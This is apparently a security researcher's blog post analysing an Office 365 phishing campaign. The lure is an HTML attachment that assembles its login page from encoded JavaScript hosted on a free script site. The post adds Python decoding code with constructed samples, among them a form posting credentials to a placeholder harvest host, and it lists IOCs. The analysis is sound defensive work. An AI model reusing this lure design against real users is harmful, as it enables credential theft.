HTML Lego: Hidden Phishing at Free JavaScript Site

This blog investigates an interesting phishing campaign we encountered recently. In this campaign, the email subject pertains to a price revision followed by numbers. There is no email body, but there is an attachment about an "investment". The convoluted filename of the attachment contains characters that are not allowed in the naming convention of a file, noticeably the vertical. Although "xlsx" appears in the filename, double-clicking the attachment prompts to open it with the default web browser, as you can see below. The file is therefore actually an HTML document.

Figure 1. Attachment of the email has two extensions, an Excel? No, it’s HTML.

Before diving into more details about the HTML file attachment, below is an overview diagram of how the phishing routine was carried out.

Figure 2. How phishing was executed

We first checked out the HTML file attachment with a text editor to view the contents. It is noticeable that a chunk of text is URL-encoded. We turned to a favorite tool, CyberChef, and used its URL Decode function. It revealed more encoded text, this time HTML entity codes.

Pulling out the HTML entity code and decoding it using CyberChef’s HTML Entity function reveals two URLs pointing at the website yourjavascript.com. This is interesting, as we had already seen this site used in phishing before, and now it is being utilized once again in this campaign. This time around, the site hosts not one, but two JavaScript files.

Figure 3. URL decoding yields HTML entity encoded text, which finally reveals two JavaScript files hosted at a remote website

With a web browser, we visited the first hosted JavaScript file, 343454545.js on yourjavascript.com, and saved a copy of the script file in case it was taken down during analysis. This hosted JavaScript file consists of two blocks of URL-encoded text.

CyberChef’s URL Decode function reveals the hidden HTML code. The first block of URL-encoded text is Part 1 of the HTML code, where the opening HTML tag is located. The second block of URL-encoded text is Part 2 of the HTML code, which contains JavaScript that validates the email and password input of the victim.

Figure 4. JS script containing URL-encoded text unveils Part 1 and Part 2 of the HTML code

With a web browser again, we visited the second hosted JavaScript file, 8898989-8787.js at yourjavascript.com and again saved it. This time, the hosted JavaScript consists of two blocks of Base64 encoded text.

Again, CyberChef’s Base64 Decode function reveals the hidden HTML code. The first block of Base64-encoded text is Part 3 of the HTML code, the body of the page. Notably, it contains the form URL to which credentials are submitted, set in the <form> tag. The second block of Base64-encoded text is Part 4 of the HTML code, which is JavaScript that triggers a popup message box.

Figure 5. JS script containing Base64 text unveils Part 3 and Part 4 of the HTML code
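The decoding chain from Figures 3 to 5, as an added example in Python rather than CyberChef (this is not code from the original post or from the phishing kit): peel URL encoding and HTML entities off an attachment to find the remote script URLs, then decode the Base64 and URL-encoded string literals of a hosted JS file to recover the HTML parts and the form URL. The attachment and JS samples are constructed, and the host names are placeholders.

```python
import base64
import html
import re
from typing import Optional
from urllib.parse import quote, unquote

def peel(text: str, max_rounds: int = 10) -> str:
    """Alternate URL decoding and HTML-entity decoding until nothing changes,
    mirroring the manual CyberChef steps (URL Decode, then HTML Entity)."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return text

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
FORM_ACTION = re.compile(r'<form[^>]*\saction=["\']([^"\']+)["\']', re.I)
# Long quoted literals made only of Base64 or percent-encoding characters.
STRING_LIT = re.compile(r'["\']([A-Za-z0-9+/=%._~-]{40,})["\']')

def remote_scripts(attachment: str) -> list:
    """Return the src URLs of <script> tags hidden under layered encoding."""
    return SCRIPT_SRC.findall(peel(attachment))

def decode_literal(blob: str) -> Optional[str]:
    """Decode one JS string literal as URL encoding or Base64; None if neither."""
    if "%" in blob:
        return unquote(blob)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def recover_html(js_source: str) -> list:
    """Recover the HTML fragments a hosted JS file carries as encoded literals."""
    fragments = [decode_literal(b) for b in STRING_LIT.findall(js_source)]
    return [f for f in fragments if f and "<" in f]

def form_actions(fragments: list) -> list:
    """Collect the credential-submission URLs from the recovered HTML parts."""
    return [url for f in fragments for url in FORM_ACTION.findall(f)]

# Constructed samples (not the real files): an attachment that URL-encodes an
# HTML-entity-encoded <script> tag, and a hosted JS file carrying two HTML parts.
def _entities(s: str) -> str:
    return "".join(f"&#{ord(c)};" for c in s)

SAMPLE_ATTACHMENT = quote(_entities('<script src="http://js-host.invalid/343454545.js"></script>'), safe="")
PART3 = '<form action="http://harvest.invalid/43390.php" method="post"><input name="user"><input name="pass"></form>'
PART4 = '<script>alert("You have been logged out. Please sign in again.")</script>'
SAMPLE_JS = 'var p3 = "%s";\nvar p4 = "%s";' % (base64.b64encode(PART3.encode()).decode(), quote(PART4, safe=""))
```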

By now we had decoded all the encoded text into mostly readable HTML. To see how the pieces fit together in the background, check the table representation below.

Figure 6. The HTML Lego: stack ‘em up and you’ll see the big picture, the phishing page

We copied over 367 lines of decoded HTML code in order, combined all five parts in a text editor, and saved the file as test.htm. Remember the last part of the HTML code at the bottom of the original email attachment we mentioned a while ago? We added that as the last part of the HTM file.

In that final part of the code, we inserted a dummy Base64-encoded email address ("mydummyemailaddress@nonexistent.com") to replace the one line where the original recipient’s Base64-encoded email address had been.

Figure 7. Setting out the bait email address

We then opened test.htm in a web browser. It pops up a message box notification suggesting the user has been logged out of their account and needs to log in once more. This phishing campaign is aimed at Microsoft Office 365 users, as the web UI is designed to mimic a Microsoft login interface, complete with logo. There is also a blurred image of some company’s invoice in the background, luring victims to key in their password in order to see it properly.

Figure 8. This phishing page is targeting Office 365 users.

The email address is automatically populated, since we inserted one into the code, but we also tried keying in an invalid email address: the phishing page has a regular expression validator for email addresses. The password input is masked. We keyed in a dummy password, "mydummypassword", in the password field. This field also has a validator that rejects a blank password.

Figure 9. Phishing page validates email address format and password length.

After hitting the "Next" button on the phishing page, we were able to capture the HTTP POST request to the form URL. It sends the stolen information: the email address in the user field and the password in the pass field. As of this writing, the said URL is still online, probably harvesting credentials from its victims. The form URL returns a 302 HTTP response, meaning a redirection to another web page. The redirection page is now blocked as a phishing website.

Figure 10. Captured HTTP POST request and web page redirection

To wrap up, this phishing campaign was a little trickier in design than usual. By improvising an HTML email attachment that pulls in remote JavaScript code hosted on a free JavaScript hosting site, and by encoding each piece differently, the attackers seek to fly under the radar and avoid detection.

IOCs

Files:

FileName: hercus-Investment 547183-xlsx.H t m l
MD5: fd0338283eebe564e6d6dd4f62f5121b
SHA1: 1d973f88469871cb643c8788945ad9425291d8b0

FileName: 343454545.js
MD5: 96f8266ae8c07105e6ab3de10b74a959
SHA1: 9b121f2ec8f7773ef91691db85ab28618d8c73b7

FileName: 8898989-8787.js
MD5: ee14a634b41cd67a924eb31c1098a75b
SHA1: 466424e133d9f86355d8330da6e55a48d6e77d2d

URLs:

  • hxxp://yourjavascript[.]com/1129720361/343454545[.]js
  • hxxp://yourjavascript[.]com/4231652881/8898989-8787[.]js
  • hxxp://tokai-lm[.]jp//shop_pic/656687-98989/43390[.]php?089766543-86564
  • hxxp://madassociates[.]asia/css/wrng[.]html
